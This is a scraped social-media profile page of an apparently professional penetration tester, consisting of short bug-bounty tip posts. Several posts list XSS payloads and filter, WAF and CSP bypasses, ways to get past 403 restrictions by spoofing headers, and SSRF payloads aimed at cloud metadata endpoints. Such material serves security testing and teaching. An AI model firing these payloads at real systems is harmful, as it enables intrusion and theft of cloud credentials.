Sapienshack
@sapienshackLead Application Security Analyst | Penetration Tester | Bug Bounty Hunter | Career Adviser | Security Researcher | Developer | Secure Code Review
Similar User
@_enigma146
@7RiXxSec
@0xcris_prp
@Watch1ngU
@_rzgami_
@sh3llvik
Check out out this certification I just earned from INE! sgq.io/CCAQCfk via @ine
cat vs wild 😜 #beargrylls #indiancat #catlover #bagarbilla youtube.com/shorts/TA0drSg… via @YouTube
<!-- alert --> #HTML entities/encode: javascript:alert() javascript:alert`` #url encoding: javascript:alert%60%60 javascript:x='%27-alert(1)-%27'; javascript:%61%6c%65%72%74%28%29 #JS unicode javascript:a\u006Cert``" javascript:\u0061\u006C\u0065\u0072\u0074``
Our Top 5 #XSS Vectors Main + Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm?.(1)//\ #XSS #GameChanger
To bypass 403 restrictions 1. Use patterns like in the URL path /* /%2f/ /./ / /*/ 2. Adding Headers in request with value 127.0.0.1 X-Custom-IP-Authorization X-Forwarded-For X-Remote-IP Forwarded-For X-Client-IP 3. Switch from GET to POST (or other methods) #CyberSecurity
You're using Burp Collaborator wrong. Don't use Burp's default collaborator instance when testing for out of band vulnerabilities. Many companies use egress filtering & block outbound traffic to the default collaborator domain oastify.com It's worth setting up a…
Want to learn SSRF? credit : imabhisarpandey (1/5) Blogs: - book.hacktricks.xyz/pentesting-web… - cobalt.io/blog/a-pentest… - payatu.com/blog/arjuns/a-… - opensourceagenda.com/projects/allth… - neuralegion.com/blog/ssrf-serv… - trustwave.com/en-us/resource… - 0xn3va.gitbook.io/cheat-sheets/w… #infosec
If you think these apps are good for #XSS testing... ❌ DVWA ❌ Altoro Mutual ❌ TestPHP VulnWeb ❌ Firing Range Sorry to say but we are in 2024! 😆 They are so old that some of their tests are meant for Internet Explorer 6 to 9! knoxss.me/?page_id=766 Update your #XSS game.
Day 4/7 : SSRF Payload for Technologies: Oracle http://192.0.0.192/latest/ http://192.0.0.192/latest/user-data/ http://192.0.0.192/latest/meta-data http://192.0.0.192/latest/attributes/ Alibaba http://100.100.100.200/latest/meta-data/…
Subdomain Finder Websites | Find Subdomains without installing tools on your machine⚔️ - subdomainfinder.c99.nl - dnsdumpster.com - pentest-tools.com/information-ga… - nmmapper.com/sys/tools/subd… - securitytrails.com/domain/ - dnsspy.io - suip.biz…
Top 5 KNOXSS #XSS Vectors Main + Inline 1')"<!--><Svg OnLoad=(confirm)(1)<!-- Full URL Validation JavaScript://%250Dtop.confirm?.(1)// Weak CSP Bypass 1'"><!--><Base Href=//X55.is? Regular JS Injection 1'-top['con\146irm'](1)-' Quoteless JSi /confirm(1)?.(1)//\ #GameChanger
Directory-brute forcing? You should NEVER filter based on status code. Paths can exist and return a 404. I’ve seen this so many times: /noexist/ -> 404 Not Found. /api/ -> 404 Not Found, but different response body (JSON formatted) /api/endpoint -> 200 OK Filter by…
XSS Validation bypass when application block "Parenthesis" " ><img onerror=alert`23` src=a> #bugbountytips #bugbountyconference #XSS #Security #waf
An XSS JSON payload to bypass WAF, by @0x0SojalSec ["');alert('XSS');//"]@xyz.xxx
For those who are new to bug bounty or those who haven’t found SSRF yet, you can use these tools to get your first SSRF bug 🎯💰 PS: Don’t completely relay on tools, do manual testing too🧑💻
An unbeatable 75% off for those ready to elevate their skills 🥳! ** Like, Comment, Re-share, and 1 lucky winner will get a 100% discount on our CMPen- Android exam!** 🔖Promo Code - CMPen-Android-75-OFF 🕵️♂️Tom's Static Analysis Adventure! Tom was knee-deep into an Android…
Nuclei scanner's power comes from fuzzing templates. The following repository have different templates for the scanner which can be used for finding unknown security vulnerabilities github.com/projectdiscove… #bugbountytips #bugbounty #CyberSecurity
Pass the eWPTXv2 Exam on Your First Attempt in 2023! { by @grumpzsux } from @hashnode grumpz.net/pass-the-ewptx…
United States Trends
- 1. Hunter 1,05 Mn posts
- 2. $KIM N/A
- 3. Josh Allen 48,8 B posts
- 4. 49ers 55 B posts
- 5. 49ers 55 B posts
- 6. Niners 10,8 B posts
- 7. #BaddiesMidwest 18,5 B posts
- 8. Burisma 37,8 B posts
- 9. Montas 3.534 posts
- 10. Purdy 8.765 posts
- 11. Dolly 14,9 B posts
- 12. The Big Guy 55,9 B posts
- 13. #SFvsBUF 21,3 B posts
- 14. Hardy 13,8 B posts
- 15. Good for Joe 30,3 B posts
- 16. AFC East 9.246 posts
- 17. #RHOP 6.351 posts
- 18. Achilles 6.041 posts
- 19. #Married2Med 4.471 posts
- 20. Manaea N/A
Something went wrong.
Something went wrong.